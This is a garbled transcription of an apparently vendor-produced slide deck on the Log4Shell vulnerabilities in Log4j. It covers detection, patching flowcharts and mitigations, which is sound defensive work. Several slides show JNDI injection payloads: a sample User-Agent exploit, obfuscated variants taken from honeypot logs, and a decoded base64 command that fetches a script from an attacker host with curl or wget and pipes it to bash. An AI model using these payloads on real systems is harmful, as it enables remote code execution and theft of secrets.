Log4j CVE-2021-44228 CVE-2021-45046 - David Olander, CTO MSS Nordics & DACH Charl van der Walt, Head of Security Research - Orange ...
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
Log4j
CVE-2021-44228
CVE-2021-45046
David Olander, CTO MSS Nordics & DAC
Charl van der Walt, Head of Security Research
H
Overview CVE-2021-44228
and CVE-2021-45046
2 Confidential
Log4j - CVE-2021-44228 (Released 9th of December)
• A vulnerability impacting Log4j versions 2.0 through 2.14.1 was disclosed on the project’s
GitHub on December 9, 2021. The flaw has been dubbed “Log4Shell,” and has the highest
possible severity rating of 10
• Log4j is an open source Java logging library that is widely used in a range of software
applications and services around the world. The vulnerability can allow threat actors to take
control of any Java-based, internet-facing server and engage in remote code execution (RCE)
attacks.
• https://nvd.nist.gov/vuln/detail/CVE-2021-44228
• https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-
apache-log4shell-vulnerability-cve-2021-44228
3 Confidential
.
Log4j - CVE-2021-45046 (Released on 14th of Dec)
• Initially there was speculation on a couple of things
• A later java version would provide some protection due to the fact
that it does not allowed execution of untrusted class file
• This has now been bypasse
• https://twitter.com/marcioalm/status/1470361495405875200
• Setting -Dlog4j2.formatMsgNoLookups=true in the command line
argument when starting the application would mitigate the issu https://twitter.com/marcioalm/status/
1470361495405875200
• This is not the case for all scenarios
• https://github.com/apache/logging-log4j2/pull/
608#issuecomment-993542299
• Based on these findings CVE-2021-45046 was released
4 Confidential
d
:
s
e
How bad is it?
• Shellshock (CVE-2014-6271 • Log4shell (CVE-2021-44228
• Allows remote code executio • Allows remote code executio
• Very widesprea • Very widesprea
• Limited to Bash (Unix systems • Huge attack surface (All OS’s
• Medium complexity to mitigate / find • Difficult to mitigate / find affected
affected system system
• CVSS 9.8/10 • CVSS 10/10
https://nvd.nist.gov/vuln/detail/CVE-2014-6271 https://nvd.nist.gov/vuln/detail/CVE-2021-44228
5 Confidential
s
d
d
s
n
n
)
)
)
)
Testing for it
• The vulnerability can be very hard to find:
• You can use your vulnerability scanner and scan for it and get a reply X hours later. This can happen if
you have a batch job running that uses log4j somewhere els
• When you get the answer back you can still be uncertain which system is vulnerable as data has
traversed your networ
• This is one of the key differentiators compared to other vulnerabilitie
• If you do not know all connections between all applications this can be a nightmare to find and then to mitigat
• Use all your tools you have; This only affects Log4j, and that requires Java
• Axonius, vulnerability management, sysadmin tools, cmdb - all could have answers to where you
run java and are using Log4j
6 Confidential
k
e
s
e
The complexity of the vulnerability
Frontend Auth
Log4j?
• As information is sent and
exchanged between applications
chances, are that Log4j will be
present somewhere. The challenge
is to find it.
Log4j?
Log4j? Backend
Weekly sync job?
Database server Daily sync job?
Clients/Servers?
Clients/Servers?
Log4j?
Log4j?
7 Confidential
Exploit in 6 easy steps
Attacker Attacker-ldap-server Attacker-http-server Victim
1. Request sent to victim
GET / HTTP/1.1
User-Agent: ${jndi:ldaps://attacker-ldap-server:443/a}
2. Vulnerable application responds back with an ldap query
Ldap query
3. LDAP server responds with information pointing to exploit code
dn:
javaClassName: foo
javaCodeBase: http://attacker-http-serve
objectClass: javaNamingReferenc
javaFactory: Exploit
4. Client requests exploit code download
Request Exploit.class
5. Client downloads exploit code
Download exploit code (Exploit.class)
6. Client loads and executes exploit code
Executes Exploit.class
8 Confidential
e
r
Stealing secrets
• If environment variables are set,
they could also be referenced
and fetched inside the java
contex
• In this example by Marcus
Hutchins an
AWS_SECRET_ACCESS_KEY
is set on the server. In the
screenshot, this variable is
fetche
• It could also be database
connection strings and
passwords
9 Confidential
https://twitter.com/MalwareTechBlog/status/1470092256359043076
d
t
Stealing secrets
• External data by the communit
• Secrets being stole
• AW
• Docke
• Hadoo
• Payload
• Ransomware 4
• Cryptominer 22
• Info stealer 61
• Unknown 13%
10 Confidential
S
r
p
s
%
%
%
n
yVia e-mail • Attackers are using e-mail to include links in subject 11 Confidential
It is also the first confirmed RCE vulnerability on Mars • Confirmed by Apache Software Foundation on the 4th of June 2021 12 Confidential
OCD data - already seeing obfuscation techniques
45.155.205.233 - - [10/Dec/2021:18:50:56 +0000] "GET / HTTP/1.1" 301 - "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/
KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zNC44OC4yMDQuMjIwOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8z
NC44OC4yMDQuMjIwOjQ0Myl8YmFzaA==}"
• Our honeypot data shows active 45.155.205.233 - - [10/Dec/2021:18:50:58 +0000] "GET / HTTP/1.1" 200 14794 "https://34.88.204.220:443/" "${jndi:ldap://45.155.205.233:12344/Basic/
Command/Base64/
exploitation started on the 10th KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zNC44OC4yMDQuMjIwOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8z
NC44OC4yMDQuMjIwOjQ0Myl8YmFzaA==}"
• Attackers are working on 167.71.13.196 - - [11/Dec/2021:07:51:15 +0000] "GET /$%7Bjndi:ldaps://e969c767.probe001.log4j.leakix.net:443/b%7D?${jndi:ldaps://
obfuscation to slip through e969c767.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://e969c767.probe001.log4j.leakix.net:443/b} HTTP/1.1" 404 196 "-" "${jndi:ldaps://
e969c767.probe001.log4j.leakix.net:443/b}"
signature-based defenses 167.71.13.196 - - [11/Dec/2021:07:51:17 +0000] "GET /$%7Bjndi:ldaps://e969c767.probe001.log4j.leakix.net:443/b%7D?${jndi:ldaps://
e969c767.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://e969c767.probe001.log4j.leakix.net:443/b} HTTP/1.1" 404 196 "-" "${jndi:ldaps://
e969c767.probe001.log4j.leakix.net:443/b}"
5.157.38.50 - - [11/Dec/2021:13:13:51 +0000] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 404 196 "-" "curl/7.58.0"
46.101.223.115 - - [11/Dec/2021:17:25:14 +0000] "GET / HTTP/1.1" 200 14794 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/
http443useragent}"
46.101.223.115 - - [11/Dec/2021:19:02:57 +0000] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 196
"-" "Kryptos Logic Telltale"
1.116.59.211 - - [11/Dec/2021:21:29:44 +0000] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 404 196 "-" "curl/7.58.0"
138.197.9.239 - - [12/Dec/2021:00:10:32 +0000] "GET / HTTP/1.1" 200 3421 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/
http80useragent}"
138.197.9.239 - - [12/Dec/2021:01:30:58 +0000] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 404 437 "-"
"Kryptos Logic Telltale"
159.223.61.102 - - [12/Dec/2021:05:23:08 +0000] "GET / HTTP/1.1" 200 3477 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}
ryedge.io:80/callback}"
159.223.61.102 - - [12/Dec/2021:05:23:08 +0000] "GET /favicon.ico HTTP/1.1" 404 492 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin$
{upper:a}ryedge.io:80/callback}
13 Confidential 89.249.63.3 - - [12/Dec/2021:05:39:09 +0000] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 404 437 "-" “curl/7.58.0"
"Looking at the payloads being dropped
• Java class files that
create a command shell
back to attacker
• In the example to the
right you can see
support for both
Windows and Linux/
Unix environments
https://twitter.com/an0n_r0/status/1469416507440615425
14 Confidential
sPayloads - one request with 3 different techniques
195.54.160.149 - - [14/Dec/2021:01:48:30 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/
KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2Ljk2LjEwNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3N
C8xODguMTY2Ljk2LjEwNDo4MCl8YmFzaA==} HTTP/1.1" 200 3440
"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/
KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2Ljk2LjEwNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3N
C8xODguMTY2Ljk2LjEwNDo4MCl8YmFzaA==}"
“${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/
KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2Ljk2LjEwNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3N
C8xODguMTY2Ljk2LjEwNDo4MCl8YmFzaA==}
In one request it tries 3 different ways of obfuscation. Base64 decodes to this:
(curl -s 195.54.160.149:5874/188.166.96.104:80||wget -q -O- 195.54.160.149:5874/188.166.96.104:80)|bas
(Payload not active at the time of investigation
15 Confidential
)
"
hCyberSOC Nordics & DACH status • Incidents, service requests, change requests related to CVE-2021-44228 and CVE-2021-45046 16 Confidential
How do I know if I am compromised?
• The actual initial compromise will be the same as any other
infection (mirai, cryptominer, cobalt strike or any other
malware). Attackers will leverage this vulnerability and deploy
their “regular” toolse
• If you have good detection capabilities in place you
increase the likelihood of detecting step 2, 3 etc
• This means having complete control over detection capabilities
is very important
17 Confidential
t
.The good side is
using it too
18 ConfidentialTo provide you with some information on the extent of the vulnerability
• Replies back from scammers’
internal infrastructur
• Sending a text message to
senders of scam text
messages
19 Confidential
https://twitter.com/p_malynin/status/1469866520939429889
eFinding real IP address behind Tor hidden servers
Goal is to get the real
• You would assume that our adversaries do a bit of logging to ip of this service
detect when things go bad on their hidden Tor hidden server
• This vulnerability is likely being used by the good side to find
the real IP addresses of malicious actors that host
infrastructure on Tor (think Ransomware operators)
Tor hidden services is what makes it possible for
20 Confidential malicious actors to hide their infrastructure
sTimeline 21 Confidential
Timeline
December
1/12 9/12 10/12 11/12 12/12 13/12 14/12 15/12 16/12 - what can be expected
Vulnerability
disclosed on Multiple sources now confirm access
Minecraft brokers connected with ransomware
affiliates and nation state groups
Confirmed payloads with have started to use the vulnerability
cryptominers, ransomware and other
payloads (Mirai etc.)
• First exploit payloads being dropped
• Official CVE published CVE-2021-44228
https://twitter.com/eastdakota/status/
1470819030155993089
• 2.15 Determined incomplete fix. New CVE
released CVE-2021-4504
• Crowdstrike publishes information that nation
First use of the vulnerability
state actors are preparing payloads
• Ransomware payloads confirmed by
Cloudflare CE
https://www.microsoft.com/security/blog/2021/12/11/
guidance-for-preventing-detecting-and-hunting-for-
https://twitter.com/eastdakota/status/
cve-2021-44228-log4j-2-exploitation/#nation-state
1469800951351427073?s=21
https://blog.checkpoint.com/2021/12/13/the-numbers-
Apache updates advise: behind-a-cyber-pandemic-detailed-dive/
https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-
cve-2021-44228-log4j-2-exploitation/ Log4j 2.12.2 for Java 7 and 2.16.0 for Java 8 and up
now fixes CVE-2021-45046 and CVE-2021-44228
https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-
exploited-in-the-wild
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Confidential https://nvd.nist.gov/vuln/detail/CVE-2021-45046
https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
O
6Mitigations 23 Confidential
No
How do I know if I am vulnerable? Is my app using Java Not vulnerable
Yes
No
• Follow this simple flowchart and work Is it using Log4j Not vulnerable
through your entire environmen
Yes
• Remember, we are not only concerned
about external applications.
No No You need to
• We also need to find everything Are you using Java 7 Are you using Java 8 upgrade and
related to internal applications as patch
well (remember how data
traverses the network) Yes Yes
Is it using a version Is it using a version
earlier than 2.12.2 earlier than 2.16.0
Yes
Yes
You need to patch, (and upgrade Java..) You need to patch
Recommended version of Log4j as o
2021-12-15 is 2.16.0 or greater for Java 8
and 2.12.2 or greater for Java 7
NOTE! Java 7 is end of life July 2022
(Released in 2011) - Java 8 EOL Dec 2030
https://www.oracle.com/java/technologies/
java-se-support-roadmap.html
24 Confidential
Please follow: https://logging.apache.org/log4j/2.x/
f
tNo
But what about Log4j 1.2? Is my app using Java Not vulnerable
Yes
No
• But I am using Log4j 1.2? Is it using Log4j Not vulnerable
• Am I ok
Yes
• N
• There are more vulnerabilities in 1.2, and it No
was end of life in 201 Is it version 1.2 Not vulnerable
• https://logging.apache.org/log4j/1.2/
Yes
• Once again
Is JMSAppender No
• Recommended version of Log4j as of You need to patch
Enabled?
2021-12-15 is 2.16.0 or greater for Java CVE-2019-17571
8 and 2.12.2 or greater for Java 7
Included in Log4j 1.2 is a SocketServer class
Yes
that is vulnerable to deserialization of
untrusted data which can be exploited to
You need to patch remotely execute arbitrary code when
combined with a deserialization gadget when
CVE-2021-4104 listening to untrusted network traffic for log
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data data. This affects Log4j versions up to 1.2 up
when the attacker has write access to the Log4j configuration. The attacker can to 1.2.17.
provide TopicBindingName and TopicConnectionFactoryBindingName
configurations causing JMSAppender to perform JNDI requests that result in
remote code execution in a similar fashion to CVE-2021-44228. Note this issue
25 Confidential only affects Log4j 1.2 when specifically configured to use JMSAppender, which
is not the default.
o
?
:
5But I have a really old version of Log4j?
Recommended version of
Log4j is 2.16.0 or greater for Java
and 2.12.2 or greater for Java
If you are using Java 6, you have a
lot of other issues as well
26 Confidential
7
8Log4j vaccine
• Released by Cybereaso
• https://www.cybereason.com/blog/cybereason-
releases-vaccine-to-prevent-exploitation-of-
apache-log4shell-vulnerability-cve-2021-44228
• https://github.com/Cybereason/Logout4Shell
• Will not survive a restart of the app - only temporary
mitigation for systems that do not have a patch ready
27 Confidential
nLog4j vaccine
• Released by Cybereaso
• https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-
log4shell-vulnerability-cve-2021-44228
• https://github.com/Cybereason/Logout4Shell
• Will not survive a restart of the app - only temporary mitigation for systems that do not have a patch ready
• IMPORTANT TO UNDERSTAND!
28 Confidential
nRemoving the Jndi lookup class
• For specific versions you can remove the JndiLookup class from the classpath for the application
• https://logging.apache.org/log4j/2.x/
• zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.clas
• We recommend everyone following the official recommendations by apache on the log4j websit
• https://logging.apache.org/log4j/2.x/
29 Confidential
s
eUpgrading Java
• In some scenarios you will not be able to update Log4j because you are running an older version of Java (e.g
Java 6 or older
• This means that you may have to rewrite your entire application to support Java 7/8 to then do the upgrade
and mitigate the vulnerability
• As of Log4j 2.13.0 Log4j 2 requires Java 8 or greater at runtim
• https://logging.apache.org/log4j/2.x/
30 Confidential
)
eJava support
• Recommended version of Log4j as
of 2021-12-15 is 2.16.0 or greater
for Java 8 and 2.12.2 or greater for
Java
• Java 7 is end of life July 2022
(Released in 2011 https://www.oracle.com/java/technologies/java-se-support-roadmap.html
• Java 8 end of life in Dec 203
• Please make sure you follow the
official channel at apache Recommended version of Log4j as o
2021-12-15 is 2.16.0 or greater for Java 8
and 2.12.2 or greater for Java 7
Please follow: https://logging.apache.org/log4j/2.x/
31 Confidential
7
)
f
0Recommended actions 32 Confidential
Recommended actions
What is the attack surface? Can we do short term mitigations? Can we apply vendor patches?
Discover Mitigation - short ter Mitigation - long ter
• Use vulnerability management tools • Turn off vulnerable applicatio • Block attacks using any
(Rapid 7 etc technology availabl
• Block attacks using any
• Or system inventory tools (Axonius etc technology availabl • Patc
• Or sysadmin tools (Bigfix etc • Change settings of running • Upgrade Java (if needed
applicatio
• Open source tool • Upgrade Log4j
• Remove JNDI classe
• Or EDR/Sysmon tools to accomplish
• Apply “vaccine
1. Find systems that are using Jav
• Apply patche
2. Zoom in on systems that are then
using log4 • Upgrade Java (if needed
3. Mitigat • Upgrade Log4
• Do not forget third party or SaaS apps
that you are using
33 Confidential
h
e
y
n
j
)
s
j
”
s
m
e
e
m
s
)
)
)
n
a
:
)Customers not
using MDR
services
34 ConfidentialDetections
• For customers not using Orange Cyberdefense MDR services we have the following recommendations
• ED
• If you have an EDR tool look for processes that include command line java when startin
• This can help you find applications that are vulnerabl
• Same with Sysmon, look at process command line argument
• Could also be interesting to look at java starting outbound connection
• LO
• If you have log data look for outgoing requests that has a User-Agent of Java/$(version)
• Can also be valuable to compare apps, ports and protocols. I.e is it ldap using port 8
• Also outgoing ldap connections from internal to externa
• NT
• Any traffic anomalies that relate to apps, ports and protocols. Look at http or ldap specificall
• Suspicious User-Agents in web traffic
35 Confidential
A
G
R
e
l
s
s
0
g
y
:Resources - Orange Cyberdefense
• Orange Cyberdefense public IOCs (updated hourly
• https://github.com/Orange-Cyberdefense/log4shell_iocs
• Blog pos
• https://orangecyberdefense.com/global/blog/threat/log4j-
vulnerability/
• Log4j RCE test environment by Leon Jacobs, Pentest Chief
Technology Office
• https://github.com/leonjza/log4jpwn
36 Confidential
t
r
)Resources - public
• Canarytokens can help if you want to know if the app is vulnerabl
• https://canarytokens.org/generate#
• Axonius has provided searches to help find vulnerable app
• https://www.axonius.com/blog/tracking-log4shell-and-related-
applications-with-axonius
• Detecting exploitatio
• https://gist.github.com/Neo23x0/
e4c8b03ff8cdf1fa63b7d15db6e3860b
• List of vulnerable applications and vendor
• https://gist.github.com/SwitHak/
b66db3a06c2955a9cb71a8718970c592
• List of vulnerability advisories for different product
• https://github.com/cisagov/log4j-affected-db
• Dutch government (Nationaal Cyber Security Centrum) information
pag
• https://github.com/NCSC-NL/log4shell
37 Confidential
e
n
s
s
s
eWhat is Orange
Cyberdefense
doing
38 ConfidentialWhat are we doing?
• Vendor collaboration and coordination regarding patche
• Helping our customers in our MDR, SOC and vulnerability service
• Stopping attacks on ourselves - protecting our customers is priority
• CyberSOC and SOC working on all front
• Updating information as we go to all customers - World watch / web sit
• https://orangecyberdefense.com/global/blog/threat/log4j-vulnerability/
• Updating and deploying any detection rules in our services - where applicable
39 Confidential
s
s
s
1
eYou can also read
